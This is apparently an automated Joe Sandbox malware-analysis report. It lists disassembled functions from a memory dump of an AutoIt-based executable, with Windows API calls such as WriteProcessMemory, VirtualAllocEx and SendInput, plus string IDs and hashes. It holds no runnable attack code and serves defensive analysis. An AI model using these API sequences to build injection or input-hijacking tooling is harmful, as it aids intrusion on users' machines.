                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                  • API String ID: 1943609520-557222456
                                                                  • Opcode ID: 7c271fc80b0ead8c388aff15fdbc3bf014d6bf53e9f6d379ea5a7706603450c6
                                                                  • Instruction ID: 2e5f6e02374ad79f214215973358e90f48ba77d1645cca24121462e070a70c78
                                                                  • Opcode Fuzzy Hash: 7c271fc80b0ead8c388aff15fdbc3bf014d6bf53e9f6d379ea5a7706603450c6
                                                                  • Instruction Fuzzy Hash: 27914B71208209AFDB14EF28D889D7EB7B9FF85710F00491DF595DB2A1DA60ED44CB52
                                                                  APIs
                                                                    • Part of subcall function 008F4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F4743,?,?,008F37AE,?), ref: 008F4770
                                                                  • CoInitialize.OLE32(00000000), ref: 0095B9BB
                                                                  • CoCreateInstance.OLE32(00982D6C,00000000,00000001,00982BDC,?), ref: 0095B9D4
                                                                  • CoUninitialize.OLE32 ref: 0095B9F1
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                  • String ID: .lnk
                                                                  • API String ID: 2126378814-24824748
                                                                  • Opcode ID: b1eed559e40ced49c178693102d28a907aeebb77043a3d0507ce27128b90980e
                                                                  • Instruction ID: 601b74aeffbb8efbaab48070df2082c7c458b4447025c7c595c5fbc37099572f
                                                                  • Opcode Fuzzy Hash: b1eed559e40ced49c178693102d28a907aeebb77043a3d0507ce27128b90980e
                                                                  • Instruction Fuzzy Hash: 5EA18A756043059FCB00DF29C484E6ABBE5FF89314F148998F9999B3A1CB31EC49CB92
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 009150AD
                                                                    • Part of subcall function 009200F0: __87except.LIBCMT ref: 0092012B
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ErrorHandling__87except__start
                                                                  • String ID: pow
                                                                  • API String ID: 2905807303-2276729525
                                                                  • Opcode ID: a549f649bb584b2a9331ed3e7300c3429ab67792770946b164657ba1af9e82b7
                                                                  • Instruction ID: 6ae217d5eeeddedfe4af5fbcf199e566d574d024c49c1df8e382c9159864f6ea
                                                                  • Opcode Fuzzy Hash: a549f649bb584b2a9331ed3e7300c3429ab67792770946b164657ba1af9e82b7
                                                                  • Instruction Fuzzy Hash: 99517D20B1C509D6DB117754E9013BE6B989BC0710F328D59E4D9863AFDE38CDD49782
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: _memset$_memmove
                                                                  • String ID: ERCP
                                                                  • API String ID: 2532777613-1384759551
                                                                  • Opcode ID: 70795588c1360819beb17460ff0a4a965a6b1284ed7ddf0f100674de62718cee
                                                                  • Instruction ID: e15badbc44bf7ee83dd3d394432d18bc7877c391ce83daaac525bcf268112539
                                                                  • Opcode Fuzzy Hash: 70795588c1360819beb17460ff0a4a965a6b1284ed7ddf0f100674de62718cee
                                                                  • Instruction Fuzzy Hash: 2051A271A00309DFDB24CF59C941BAAB7F8EF44304F20496EE55ADB291E774EA94CB80
                                                                  APIs
                                                                    • Part of subcall function 009514BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00949296,?,?,00000034,00000800,?,00000034), ref: 009514E6
                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0094983F
                                                                    • Part of subcall function 00951487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009492C5,?,?,00000800,?,00001073,00000000,?,?), ref: 009514B1
                                                                    • Part of subcall function 009513DE: GetWindowThreadProcessId.USER32(?,?), ref: 00951409
                                                                    • Part of subcall function 009513DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0094925A,00000034,?,?,00001004,00000000,00000000), ref: 00951419
                                                                    • Part of subcall function 009513DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0094925A,00000034,?,?,00001004,00000000,00000000), ref: 0095142F
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009498AC
                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009498F9
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                  • String ID: @
                                                                  • API String ID: 4150878124-2766056989
                                                                  • Opcode ID: ca547cfca4bbecb4b24a97f886ea31e1399b507be335ddb7649da3de8a524734
                                                                  • Instruction ID: 8b7823a480daabe2fc8c4da66e4e85314b9e888b3870b97603fdacaa07317c66
                                                                  • Opcode Fuzzy Hash: ca547cfca4bbecb4b24a97f886ea31e1399b507be335ddb7649da3de8a524734
                                                                  • Instruction Fuzzy Hash: 0A412A76900218AEDB10DFA4CC81FDEBBB8AB49740F004199FA45B7191DA716E89CBA0
                                                                  APIs
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0097F910,00000000,?,?,?,?), ref: 009779DF
                                                                  • GetWindowLongW.USER32 ref: 009779FC
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00977A0C
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window$Long
                                                                  • String ID: SysTreeView32
                                                                  • API String ID: 847901565-1698111956
                                                                  • Opcode ID: a28fec081e6d05194df565fc88f7733391cc9a0f01ca71baeed0d2bd4dd0ffa0
                                                                  • Instruction ID: 9cb7145087c1a942f4b220e526dcae3a81ce0f534a6a9dda90ea16adbfd3e72c
                                                                  • Opcode Fuzzy Hash: a28fec081e6d05194df565fc88f7733391cc9a0f01ca71baeed0d2bd4dd0ffa0
                                                                  • Instruction Fuzzy Hash: 2331B232205209ABDB158E78CC45BEAB7A9FB45334F208725F979E32E0D731E9519B50
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00977461
                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00977475
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00977499
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: SysMonthCal32
                                                                  • API String ID: 2326795674-1439706946
                                                                  • Opcode ID: 204217bdb432d724f42644cb5b6f2687da076bd3eeeb114e75de664bf50e8ce5
                                                                  • Instruction ID: 0904207db468a6217612412d5a083d8451d0f7e9e58011f89a9211a3c20f5b79
                                                                  • Opcode Fuzzy Hash: 204217bdb432d724f42644cb5b6f2687da076bd3eeeb114e75de664bf50e8ce5
                                                                  • Instruction Fuzzy Hash: 9D219433614218ABDF118F94CC46FEA7B6AFF48724F114114FE196B1E0DA75AC51DBA0
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00977C4A
                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00977C58
                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00977C5F
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend$DestroyWindow
                                                                  • String ID: msctls_updown32
                                                                  • API String ID: 4014797782-2298589950
                                                                  • Opcode ID: e5989fcd8c8123ed86db9fd47e9902689d313c9da1958359310228c75cc3e950
                                                                  • Instruction ID: 297a0a273b0f1aa20b3f0d200ff840df3ee1e3fb17d449ed5b0dffbe7b9cc19d
                                                                  • Opcode Fuzzy Hash: e5989fcd8c8123ed86db9fd47e9902689d313c9da1958359310228c75cc3e950
                                                                  • Instruction Fuzzy Hash: A421AEB2204208AFDB11DF68DCC1DA677ECEF5A364B154018FA089B3A1CB31EC018AA0
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00976D3B
                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00976D4B
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00976D70
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend$MoveWindow
                                                                  • String ID: Listbox
                                                                  • API String ID: 3315199576-2633736733
                                                                  • Opcode ID: 958b32dc56288b5cec32d68f55ef19fce7b75ee8ff6e67f990cabbfa9cb9f600
                                                                  • Instruction ID: 7cf202a3eeac745319634ab728e350edb80dcfd50c0a249de953e016f845fb4f
                                                                  • Opcode Fuzzy Hash: 958b32dc56288b5cec32d68f55ef19fce7b75ee8ff6e67f990cabbfa9cb9f600
                                                                  • Instruction Fuzzy Hash: 77217F33610118AFDF228F54CC45FAB3BBEEB89764F018124FA499B1A0CA719C519BA0
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00977772
                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00977787
                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00977794
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: msctls_trackbar32
                                                                  • API String ID: 3850602802-1010561917
                                                                  • Opcode ID: f3184d41c208bbbc6a936f3df294cbb3975dd4916205b61c7feda370d3ebc4f3
                                                                  • Instruction ID: 37c3044d17d67e959a4f22ff80cd368db034de7e7bd68c45ff7eefce687bd7b1
                                                                  • Opcode Fuzzy Hash: f3184d41c208bbbc6a936f3df294cbb3975dd4916205b61c7feda370d3ebc4f3
                                                                  • Instruction Fuzzy Hash: C7112732204208BFEF145FA4CC05FE7776CEF88B54F028118F749A6090C671E811DB20
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,008F4BD0,?,008F4DEF,?,009B52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008F4C11
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 008F4C23
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 2574300362-3689287502
                                                                  • Opcode ID: 6ae795350daf2146e660b0ad069f0cbf453cd9c45b71af3dca37dba41c0cfb7a
                                                                  • Instruction ID: b63f85e2e906a272f3fe8e4b5b961fd94103844d98e49f273c909ff8b71e3210
                                                                  • Opcode Fuzzy Hash: 6ae795350daf2146e660b0ad069f0cbf453cd9c45b71af3dca37dba41c0cfb7a
                                                                  • Instruction Fuzzy Hash: CFD0C231514713CFC7209F70C818207B6D5EF09341F01DC3A9589E2150E6B0C4C0CA60
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,008F4B83,?), ref: 008F4C44
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 008F4C56
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00971039), ref: 00970DF5
                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00970E07
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00968CF4,?,0097F910), ref: 009690EE
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00969100
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                  APIs
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: LocalTime__swprintf
                                                                  • String ID: %.3d$WIN_XPe
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0096E0BE
                                                                  • CharLowerBuffW.USER32(?,?), ref: 0096E101
                                                                    • Part of subcall function 0096D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0096D7C5
                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0096E301
                                                                  • _memmove.LIBCMT ref: 0096E314
                                                                  Similarity
                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                  • String ID:
                                                                  APIs
                                                                  • CoInitialize.OLE32(00000000), ref: 009680C3
                                                                  • CoUninitialize.OLE32 ref: 009680CE
                                                                    • Part of subcall function 0094D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0094D5D4
                                                                  • VariantInit.OLEAUT32(?), ref: 009680D9
                                                                  • VariantClear.OLEAUT32(?), ref: 009683AA
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                  • String ID:
                                                                  APIs
                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00982C7C,?), ref: 009476EA
                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00982C7C,?), ref: 00947702
                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,0097FB80,000000FF,?,00000000,00000800,00000000,?,00982C7C,?), ref: 00947727
                                                                  • _memcmp.LIBCMT ref: 00947748
                                                                  Similarity
                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                  • String ID:
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Variant$AllocClearCopyInitString
                                                                  • String ID:
                                                                  APIs
                                                                  • GetWindowRect.USER32(0139EB50,?), ref: 00979863
                                                                  • ScreenToClient.USER32(00000002,00000002), ref: 00979896
                                                                  • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00979903
                                                                  Similarity
                                                                  • API ID: Window$ClientMoveRectScreen
                                                                  • String ID:
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00949AD2
                                                                  • __itow.LIBCMT ref: 00949B03
                                                                    • Part of subcall function 00949D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00949DBE
                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00949B6C
                                                                  • __itow.LIBCMT ref: 00949BC3
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 009669D1
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 009669E1
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00966A45
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00966A51
                                                                  Similarity
                                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                                  • String ID:
                                                                  • API String ID: 2214342067-0
                                                                  • Opcode ID: af11fd79c6d2fdbf79af7fd7528519ea58493444d76074a5b832c8f343f23abf
                                                                  • Instruction ID: 77ef30a27ba0b3d026269cb3f589546a03c540f9abc92fd9609adf4b569f2767
                                                                  • Opcode Fuzzy Hash: af11fd79c6d2fdbf79af7fd7528519ea58493444d76074a5b832c8f343f23abf
                                                                  • Instruction Fuzzy Hash: 2F418375740204AFEB50BF78CC86F7977A8EF44B54F048468FA59EB2D2DA709D008B52
APIs
• #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0097F910), ref: 009664A7
• _strlen.LIBCMT ref: 009664D9
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: _strlen
• String ID:
• API String ID: 4218353326-0
• Opcode ID: 7f4a368403816182af41918d6656042734b9c3ba302ad45336ed4ea597df4b1c
• Instruction ID: d96c715e31e2134ce8a0e2f0e9c00cbbed48d71e41bdb75d5d85901aa63574b0
• Opcode Fuzzy Hash: 7f4a368403816182af41918d6656042734b9c3ba302ad45336ed4ea597df4b1c
• Instruction Fuzzy Hash: 78418371600118ABCB14EBB8EC96FBEB7A9EF44314F148155F91AD7292DB30AD44CB51
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0095B89E
• GetLastError.KERNEL32(?,00000000), ref: 0095B8C4
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0095B8E9
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0095B915
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 8119592d7099e720d3a7923e606c3722e7dded77e6160587fffeb1d6e1088e1d
• Instruction ID: de9ec1e569c9766890c357bc7b491ca08b495b4191ffff04cc33a06c98a7faef
• Opcode Fuzzy Hash: 8119592d7099e720d3a7923e606c3722e7dded77e6160587fffeb1d6e1088e1d
• Instruction Fuzzy Hash: A7412C35600514DFCB10EF29C494A69BBE5FF89354F098098ED8AAB362CB30FD45DB92
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009788DE
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: 4fb75a5b29334a43e8fdca0d4ac144c32c9f8a690946cb1fc417c085965f393c
• Instruction ID: 5c918236a8fe8a3eaea8b2a149a4a216ca47e1e74dd9f3c2a38481ff23537be4
• Opcode Fuzzy Hash: 4fb75a5b29334a43e8fdca0d4ac144c32c9f8a690946cb1fc417c085965f393c
• Instruction Fuzzy Hash: 21310632694109FFEB249A68CC4DBFA37A8FB05360F548511FB2DE61A1CE30D9409757
APIs
• ClientToScreen.USER32(?,?), ref: 0097AB60
• GetWindowRect.USER32(?,?), ref: 0097ABD6
• PtInRect.USER32(?,?,0097C014), ref: 0097ABE6
• MessageBeep.USER32(00000000), ref: 0097AC57
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: 4862f6d57dcb14cdb661022f88a947f5464c3a3ed7e533506ac10e65f9e397b3
• Instruction ID: cae5306dbecbca3c2e080eed3c5e74e33f8bcb8adcfd05b6cfaee1d544107bb4
• Opcode Fuzzy Hash: 4862f6d57dcb14cdb661022f88a947f5464c3a3ed7e533506ac10e65f9e397b3
• Instruction Fuzzy Hash: EC418E32604119EFCB12DF58C884B6D7BF9FB89310F18C5A9E85CDB260D730A841DB92
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00950B27
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00950B43
• PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00950BA9
• SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00950BFB
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 3852abc956066233060e2e0fc00d31adea129be7af486c175123e16eb9b9d738
• Instruction ID: 34d5be1083058a3fc68497216a477ce960430f942c388fda55e732c14263da07
• Opcode Fuzzy Hash: 3852abc956066233060e2e0fc00d31adea129be7af486c175123e16eb9b9d738
• Instruction Fuzzy Hash: BE313530944208AFFF30CB26CC55BFEBBA9ABC531AF08466AFC94521D1C37989889751
APIs
• GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00950C66
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00950C82
• PostMessageW.USER32(00000000,00000101,00000000), ref: 00950CE1
• SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00950D33
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 57a30e1750555447bb863beee5d6c223b92ebc1252cdbd3655e742a921fd0ba9
• Instruction ID: 96be6d22fe855632a4c97fb5e99379f01778b73fdf00b63f1124e888ccf42198
• Opcode Fuzzy Hash: 57a30e1750555447bb863beee5d6c223b92ebc1252cdbd3655e742a921fd0ba9
• Instruction Fuzzy Hash: 82315530900308AEFF30CB66C814BFEBBBAABC6312F04475AE8C4661D1C33899999751
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009261FB
• __isleadbyte_l.LIBCMT ref: 00926229
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00926257
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0092628D
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: dcc60d99876ef74debb3cace7dfe77a6db86122f7cd88d8c70ebf427c39198d3
• Instruction ID: c9f0244f04226156e87ef253b915d0cbd5638d259e670ed1bf9237699594591d
• Opcode Fuzzy Hash: dcc60d99876ef74debb3cace7dfe77a6db86122f7cd88d8c70ebf427c39198d3
• Instruction Fuzzy Hash: 3A31D231608266EFDF218F64EC44BAA7FB9FF41310F154428E864D7595D730E990DB90
APIs
• GetForegroundWindow.USER32 ref: 00974F02
  • Part of subcall function 00953641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0095365B
  • Part of subcall function 00953641: GetCurrentThreadId.KERNEL32 ref: 00953662
  • Part of subcall function 00953641: AttachThreadInput.USER32(00000000,?,00955005), ref: 00953669
• GetCaretPos.USER32(?), ref: 00974F13
• ClientToScreen.USER32(00000000,?), ref: 00974F4E
• GetForegroundWindow.USER32 ref: 00974F54
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: 561a0f4c5b9d1494723c34a16e3ede860ffb68c9388699aeb96a243f09705a78
• Instruction ID: be603100806e52b362ad085913729c7dbca8318a696b042e642035e2c7d02a39
• Opcode Fuzzy Hash: 561a0f4c5b9d1494723c34a16e3ede860ffb68c9388699aeb96a243f09705a78
• Instruction Fuzzy Hash: 3A312D72D00108AFCB00EFB9C885AEFB7F9EF89300F10406AE555E7241DA719E458FA1
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 00953C7A
• Process32FirstW.KERNEL32(00000000,?), ref: 00953C88
• Process32NextW.KERNEL32(00000000,?), ref: 00953CA8
• CloseHandle.KERNEL32(00000000), ref: 00953D52
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
• String ID:
• API String ID: 420147892-0
• Opcode ID: 9c455d8ae16d258201c09eb68aaddfcd3fb392ffb74858b285be9cee4a75508a
